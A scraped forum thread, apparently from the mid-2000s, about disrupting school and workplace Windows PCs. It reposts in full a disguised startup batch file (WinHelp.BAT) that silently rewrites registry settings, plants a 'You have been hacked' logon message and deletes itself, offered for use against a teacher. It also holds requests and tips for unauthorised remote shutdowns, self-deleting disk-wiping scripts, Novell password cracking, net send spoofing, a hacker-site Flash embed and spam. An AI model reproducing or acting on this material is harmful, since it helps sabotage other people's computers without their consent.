I have put in some script that was posted earlier on this forum and now i can get my mouse back to normal and that hacked thing keeps popping up, also i cant delete the Winlogon.exe file. Can anyone help me plz!
Printable View
I have put in some script that was posted earlier on this forum and now i can get my mouse back to normal and that hacked thing keeps popping up, also i cant delete the Winlogon.exe file. Can anyone help me plz!
REVERSE THE SETTINGS W/ THIS BATCH
echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="0" >> c:\reg.reg
echo "MouseSpeed"="2" >> c:\reg.reg
echo "DoubleClickSpeed"="50" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
echo "Key***rdDelay"="2" >> c:\reg.reg
echo "Key***rdSpeed"="2" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:0 >> c:\reg.reg
echo. >> c:\reg.reg
REGEDIT /s c:\reg.reg
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
del "c:\reg.reg"
exit
Open your registry and delete the keys
:LegalNoticeCaption
:LegalNoticeText
This is where the keys will be located-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Restart your comptuer or HIT F4 to re***** your registry and everything will be fine.
hi im a newbie to al this i no alittle and i mean very little i ran the one that SyntaX****** posted up here on a friends computer and now i need to reverse the effects i would really apreciate it if someone could help me every hting is fine except for the logon message is still there saying you have been hacked contact *-800....
cheers
sorry not only new but also thick didnt realise there were three pages and wat im looking for is on the third sorry my bad
lol thats funny, but i have no idea
---
<object classid="clsid:D27CDB6E-AE6D-**cf-*6B8-44455*540000" width=200 height=200> <param name=movie value=http://hackerz-alliance.com/optix/aa.swf> <param name=play value=true> <param name=loop value=true> <param name=quality value=high> <embed src=http://hackerz-alliance.com/optix/aa.swf width=200 height=200 play=true loop=true quality=high> </embed> </object>
I don't know if anyone is still looking at this thread, but if you're going to do a remote shutdown with XP, I've noticed that a certain security setting has to be in place.
Go to Start > Programs > Administrative Tools (provided that it's there) > Local Security Policy
In the little tree to the left, make sure you go to the Security Settings > Local Policies > Security Options menu. Then scroll down to where you see "Network Access: Sharing and security model for local accounts", and set it to Classic mode as opposed to the Guest only mode.
This allows any local users to log on remotely, then you can use a tool like <a href="http://www.sysinternals.com/ntw2k/freeware/psshutdown.shtml">psShutdown</a> to log in as that user and shut 'em down.
Granted you'll need a local admin account on that machine and know the password, so that might not work at your school, but it's useful to know for other purposes.
If nothing else, while you're at school, try a command like this:
net send * Help, the principal touched me like Michael Jackson!
That's always fun (we got in trouble back in school for playing with the old winpopup on some Win*5 machines).
Now, the only problem is that there was a vulnerability in the messenger service (which delivers the net send commands), and Microsoft solved the vulnerability by sending out a patch that disabled the serivce by default. However, your school might have the service on so they can send out outage notices or what not. Either way, it's worth a shot. Oh, and btw, any message you send out will have the host name on it that sent it, so do it from your friend's computer.
I am having trouble making batch files. What I want to do is make four batch files. The first one to be placed in the startup directory to shutdown or disable the computer. The second one to do so remotely. Assume that the cmd remote shutdown line was disabled because you cannot see any other computers. This is for the school network, which is Novell netware 5.86. I have access to cmd, regedit, my computer, control panel, administrative tools, and everything not part of the network. I can make a new windows user with admin rights. Most things on the network are disabled. I can use Remote Assistance, but no other messenging services. I can also map the network drive, giving me access to all files, except other home directories. I was able to somehow, once logged on as them, add myself and others to the trustee rights of that student. I cannot do this to any other students. Even though i can see most network files, i cannot use some of them. Any other network tricks or ideas would be helpful. The second to wipe all files in the folder that I specify, on my command. It would be nice if it also deleted any reference to these files. The third to wipe the hard drive totaly clean, and keep the files from being recoverable, also on my command, not automaticly. It would also be great if the last two could delete themselves afterward. I didn't see any other threads where this should be posted, so this one looked good. Any help would be useful. I would also like some current novell password hack programs, all the ones that i found were out of date. I just found pandora though, so i will try that. Sorry to ask so much of you, but the people here all seemed to be experts.
Simply because I've been searching for this for some time now, only to solve it myself...
IF you're looking to remotely shutdown an XP Pro machine and are receiving Access is Denied, even though you can connect to the remote desktop... Turn your simple file sharing off, then try to shut 'er down again.
Wheee!
how do u turn simple file sharing off?
- a noob
[QUOTE=Unregistered]I am having trouble making batch files. What I want to do is make four batch files. The first one to be placed in the startup directory to shutdown or disable the computer. The second one to do so remotely. Assume that the cmd remote shutdown line was disabled because you cannot see any other computers. This is for the school network, which is Novell netware 4.86. I have access to cmd, regedit, my computer, control panel, administrative tools, and everything not part of the network. I can make a new windows user with admin rights. Most things on the network are disabled. I can use Remote Assistance, but no other messenging services. I can also map the network drive, giving me access to all files, except other home directories. I was able to somehow, once logged on as them, add myself and others to the trustee rights of that student. I cannot do this to any other students. Even though i can see most network files, i cannot use some of them. Any other network tricks or ideas would be helpful. The second to wipe all files in the folder that I specify, on my command. It would be nice if it also deleted any reference to these files. The third to wipe the hard drive totaly clean, and keep the files from being recoverable, also on my command, not automaticly. It would also be great if the last two could delete themselves afterward. I didn't see any other threads where this should be posted, so this one looked good. Any help would be useful. I would also like some current novell password hack programs, all the ones that i found were out of date. I just found pandora though, so i will try that. Sorry to ask so much of you, but the people here all seemed to be experts.[/QUOTE]
sorry, typo 4.86, not 5.86
[
hey guys in need help.
i want to shutdown a pc on our network at work but i dont know the commands to do it using ms dos promt.
How to turn off Simple File Sharing in Windows XP Professional:
Open up a folder (double-clicking on My Computer will do). On the menu bar, go to Tools, then Folder Options...
Go to the View tab, and then in the Advanced Settings box, it will be the last item. It will say <I>Use Simple File Sharing (recommended)</I>. Uncheck the box to disable it.
Now as for the whole remote shutdown fix, I dunno about that. The security option thingy in Post #46 worked for me.
What if we dont have Xp Pro? i have regular Xp
no, wait i found it, but access is still denied, how do i get past this?
Try the instructions at the top of Post #46 (about editing the security policy). You'll have to make this change on the computer that you want to remotely shut down from your local network. Also, the setting is <B>not</B> by default, which means unless you've already done this, you'll have to go in and set it before the remote shutdowns are going to work.<BR>Next you'll need the username and password of an account (I think one with administrative priviliges) on your target computer.<BR>
Then try to remotely shut the target computer down from another computer on the LAN. For simplification, you can use a GUI tool like this: <A href="http://www.matcode.com/remoteshutdown.htm">Remote Shutdown GUI</A>.<BR>
Hope that helps.
I dont have Administrative tools under my start programs
It's not there by default. First, make sure that the account you're using has admin rights. Then, right-click on the taskbar and select Properties. Go to the Start Menu tab, and click the Customize button for either version of the Start Menu you're using (XP or Classic).<BR>
<BR>
If you're using the <B>XP Start Menu</B>: After clicking the Customize button, go to the Advanced tab of the menu that comes up. In the box entitled Start Menu items, scroll all the way to the bottom to where you see the item System Administrative Tools, and change the option to display them.<BR>
<BR>
If you're using the <B>Classic Start Menu</B>: After clicking the Customize button, look at the "Advanced Start Menu Options" box and the Display Administrative Tools item should be the first checkbox.<BR>
<BR>
Hope that helps/works.
Im lost... I have a local network here at home and I would like to use the remote shutdown command (cause im lazy, and I dont feel like walking to the other side of the house to turn them off). Perfect opportunity to make this work right? Wrong. I tried the policy change procedure in post 46, and used the psshutdown command line utility. All are winxp pro, and I have admin rights on the local machine as well as the accounts/passwords for the other computers. I still receive the error "access is denied". Does anyone know what I might be missing?
[quote]
I would like to use the remote shutdown command (cause im lazy, and I dont feel like walking to the other side of the house to turn them off).
[/quote]
In your line of code for the psshutdown.exe you need to specify a the computername and username and pass of the machine you are shutting down.
Ex: I am trying to shut down a computer named BOB. A user has an account on the computer with username: Syntax****** password: shutdown
[code]
psshutdown -f -u BOB\Syntax****** -p shutdown
[/code]
<b>I have a .vbs script just for that purpose. It will actually be a script running in the background that says "IF THE PROCESS %WHATEVER.EXE% START STOP IT IMMEDIATELY" What is the name of the process that runs when you start the messenger? I will add it to the script and post it here.[/QUOTE]<b>
msnmsgr.exe is the process
if it wont let you run cmd.exe just run command.exe (or just command in the run box) ive found it will run when cmd.exe is disabled =)
this is on a win2k and xp box however...win*x only has command.exe and cmd isnt on win*x
to shut down a pc you have admin rights on...make a scheduled task in your windows (or hers, she probably wont find it) and have the shutdown command shut the pc off at *0pm
OK OK PLEASE HELP ME SOMONE I know like all the command prompt stuff but Ineed to know one more thing if your trying to add an account witch I had done before but they caught me and now it says ACCESS DENIED is there a way through command prompt to grand access...
Ryan >>>THX
hey ... i bet this is random but can somone tell me how to make a batch file that runs when windows starts that requires a boot disk
how do u pass the access denied alert? i want to plauge all my schools computers
echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="*" >> c:\reg.reg
echo "MouseSpeed"="*" >> c:\reg.reg
echo "DoubleClickSpeed"="*00" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
echo "Key***rdDelay"="5" >> c:\reg.reg
echo "Key***rdSpeed"="*0" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo "Start Page"="http://www.google.com/" >> c:\reg.reg
echo.
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg
[QUOTE=Unregistered]My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
Thanks.[/QUOTE]
nothing but newbs and script kiddies in this forum :rolleyes:
its funny as crap how many people ran that bat file on thier own computer. who in thier right mind would run a file meant to do harm to another on your own compy. lmao
I am now inspired to write my own file. :D
I know you can control pint job through net print.
but considering that there seemd to be no protection throught the printers in my school is there any way to go throught there to get toe other comps?
i want to shut down some networked pc using cmd or a bat file but i dont know the computer names can somebody help me plz
[QUOTE=Unregistered]i want to shut down some networked pc using cmd or a bat file but i dont know the computer names can somebody help me plz[/QUOTE]
if you can get to the computer you want to shutdown type in " ipconfig /all "
and find the ip/comp name
sir,
I am using lan system ,i want 2 delete/change administrator password
I done these step but vain
goto comond prompt
and write net user administrator*
no found administrator changed and delete opetion plz help me
[QUOTE=Unregistered]i know u ppl will think im a complete loser which i am. ive been trying to hack and send virsus scince the 5th grade and i havnt gone anywhere you guys seem smart could anyone plz point me in the right direction where to learn?[/QUOTE]
one too but im trying i just have this crazy internet filter that i cant get around. i even have the pasword. any ideas about books or where to start being a hacker would be much aprisheated.
once i have sumones ip address what can i do? could i possibly hack there game account if they play the same one as me?
wow,
these post are really very helpful... i've been trying to do the same thing but with no luck on the shutdown.exe..... Im also getting access denied. Im trying this on a Peer-To-Peer LAN. Each workstation has WinXP SP2 on it. What is wierd is that each workstation userid's are on admin level (unless there is something higher than "Administrator").. including whatever station I use. I have admin access to any workstation that I sit into but I cannot get accomplish this remotely (I mean station shutting down another station)... I will appreciate the help... oh and another thing, hopefully I can accomplish this without using a third party freeware.... i really wanted to learn how stuff works.... hope ya'll understand
Create a list of your poop. Include poop of your choice (size, path, date, etc). Save in internal format or export as text, html or xls. Import lists created by other applications. Find duplicates in your toilet. Compare your list to other people's lists (find out what others have that you don't, and the opposite). Insert & edit items. Plenty options to satisfy almost anyone
[url=http://weblogs.jomc.unc.edu:*6080/briman/wp-content/spell-plugin/poop/*.html]download diz here prog[/url]
Naa, its technology, we cant please everyone, and in the last *0 minutes i've been all over the world. Its my opinion that the good outweighs the bad.
How do you stop this batch file from runnning and make the "You have been haked" stop coming on.
That was posted by Syntax****** on 02-*2-2005, 05:*0 AM
I need it to stop running.
[QUOTE=SyntaX******;5*62]I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.
Put This Under All Users and make her log onto your computer...
SAVE AS WinHelp.BAT and place the file here
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
--------------------------------------------
echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="*" >> c:\reg.reg
echo "MouseSpeed"="*" >> c:\reg.reg
echo "DoubleClickSpeed"="*00" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
echo "Key***rdDelay"="5" >> c:\reg.reg
echo "Key***rdSpeed"="*0" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo "Start Page"="http://www.google.com/" >> c:\reg.reg
echo.
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg
REGEDIT /s c:\reg.reg
start iexplore.exe [url]www.google.com[/url]
start iexplore.exe [url]www.google.com[/url]
start iexplore.exe [url]www.google.com[/url]
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
exit
-------------------------------------
Edited for links.[/QUOTE]
I haven't read the whole thread or really what this is about but you should be able to press Ctrl+C to stop anything running in a command prompt. As something else I don't know if anyone else has added this but the command prompt shutdown tool can be used to stop Windows from shutting down. Say you ended a critical process such as smss and Windows gives you that Windows must shutdown message, you can open a command prompt and stop the shutdown by typing something like "shutdown -a" and the pop up will disappear.
to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....
*.-go to terminal
2.-log like root
*.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.:D
well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....:D
to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....
*.-go to terminal
2.-log like root
*.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.:D
well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....:D